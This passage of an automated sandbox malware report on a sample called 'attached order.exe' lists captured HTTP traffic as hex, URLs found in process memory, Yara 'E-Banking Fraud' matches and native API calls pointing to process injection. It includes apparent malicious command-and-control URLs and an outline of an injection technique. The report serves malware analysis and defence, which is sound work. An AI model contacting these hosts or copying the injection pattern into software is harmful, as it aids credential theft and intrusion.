09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 27 Nov 2024 10:30:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 
09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 27 Nov 2024 10:30:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 
09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 27 Nov 2024 10:30:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 
09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                      Source: RAVCpl64.exe, 00000004.00000002.17803569863.00000000065DC000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.000000000406C000.00000004.10000000.00040000.00000000.sdmp; String found in binary or memory: http://iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQ
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, attached order.exe, 00000000.00000002.16557711789.00000000033DE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://tempuri.org/_prof_basesDataSet.xsd
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://tempuri.org/_prof_basesDataSet1.xsd
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vimeo.com/api/v2/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vimeo.com/api/v2/activity/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vimeo.com/api/v2/album/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vimeo.com/api/v2/channel/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vimeo.com/api/v2/group/
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://vimeo.com/api/v2/video/
                      Source: RAVCpl64.exe, 00000004.00000002.17797622157.0000000003629000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.1qcczjvh2.autos
                      Source: RAVCpl64.exe, 00000004.00000002.17797622157.0000000003629000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.1qcczjvh2.autos/pfw9/
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: RAVCpl64.exe, 00000004.00000002.17803569863.000000000644A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.0000000003EDA000.00000004.10000000.00040000.00000000.sdmp; String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                      Source: RAVCpl64.exe, 00000004.00000002.17803569863.000000000644A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.0000000003EDA000.00000004.10000000.00040000.00000000.sdmp; String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                      Source: t577G2K6.5.dr; String found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.dr; String found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: t577G2K6.5.dr; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://gemini.google.com/app?q=
                      Source: cacls.exe, 00000005.00000003.17056037329.000000000093D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/
                      Source: cacls.exe, 00000005.00000003.17056037329.000000000093D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com//
                      Source: cacls.exe, 00000005.00000003.17056037329.000000000093D000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17056303248.0000000000959000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17793373650.0000000000959000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/v104
                      Source: cacls.exe, 00000005.00000002.17793373650.000000000091D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                      Source: cacls.exe, 00000005.00000002.17793373650.00000000008F2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                      Source: cacls.exe, 00000005.00000003.17055085856.0000000007B08000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.dr; String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.dr; String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
                      Source: cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.dr; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      Source: Yara match; File source: 3.2.attached order.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.attached order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: initial sample; Static PE information: Filename: attached order.exe
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_0042CE23 NtClose,3_2_0042CE23
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_01772BC0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01772B90
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772A80 NtClose,LdrInitializeThunk,3_2_01772A80
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_01772D10
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01772EB0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_017734E0 NtCreateMutant,LdrInitializeThunk,3_2_017734E0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01774260 NtSetContextThread,3_2_01774260
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01774570 NtSuspendThread,3_2_01774570
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_017729F0 NtReadFile,3_2_017729F0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_017729D0 NtWaitForSingleObject,3_2_017729D0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772B20 NtQueryInformationProcess,3_2_01772B20
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772B10 NtAllocateVirtualMemory,3_2_01772B10
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772B00 NtQueryValueKey,3_2_01772B00
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772BE0 NtQueryVirtualMemory,3_2_01772BE0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772B80 NtCreateKey,3_2_01772B80
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772A10 NtWriteFile,3_2_01772A10
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772AC0 NtEnumerateValueKey,3_2_01772AC0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772AA0 NtQueryInformationFile,3_2_01772AA0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772D50 NtWriteVirtualMemory,3_2_01772D50
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772DC0 NtAdjustPrivilegesToken,3_2_01772DC0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772DA0 NtReadVirtualMemory,3_2_01772DA0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772C50 NtUnmapViewOfSection,3_2_01772C50
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772C30 NtMapViewOfSection,3_2_01772C30
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772C20 NtSetInformationFile,3_2_01772C20
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772C10 NtOpenProcess,3_2_01772C10
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772CF0 NtDelayExecution,3_2_01772CF0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772CD0 NtEnumerateKey,3_2_01772CD0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772F30 NtOpenDirectoryObject,3_2_01772F30
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772F00 NtCreateFile,3_2_01772F00
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772FB0 NtSetValueKey,3_2_01772FB0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772E50 NtCreateSection,3_2_01772E50
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772E00 NtQueueApcThread,3_2_01772E00
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772ED0 NtResumeThread,3_2_01772ED0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772EC0 NtQuerySection,3_2_01772EC0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01772E80 NtCreateProcessEx,3_2_01772E80
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_017738D0 NtGetContextThread,3_2_017738D0
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01773C30 NtOpenProcessToken,3_2_01773C30
                      Source: C:\Users\user\Desktop\attached order.exe; Code function: 3_2_01773C90 NtOpenThread,3_2_01773C90
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02F22AC0
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22A80 NtClose,LdrInitializeThunk,5_2_02F22A80
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22A10 NtWriteFile,LdrInitializeThunk,5_2_02F22A10
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_02F22BC0
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02F22B90
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22B80 NtCreateKey,LdrInitializeThunk,5_2_02F22B80
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F22B10
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22B00 NtQueryValueKey,LdrInitializeThunk,5_2_02F22B00
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F229F0 NtReadFile,LdrInitializeThunk,5_2_02F229F0
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22E50 NtCreateSection,LdrInitializeThunk,5_2_02F22E50
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22F00 NtCreateFile,LdrInitializeThunk,5_2_02F22F00
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22CF0 NtDelayExecution,LdrInitializeThunk,5_2_02F22CF0
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22C30 NtMapViewOfSection,LdrInitializeThunk,5_2_02F22C30
                      Source: C:\Windows\SysWOW64\cacls.exe; Code function: 5_2_02F22D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_02F22D10
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F234E0 NtCreateMutant,LdrInitializeThunk,5_2_02F234E0
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_02F24260 NtSetContextThread,5_2_02F24260
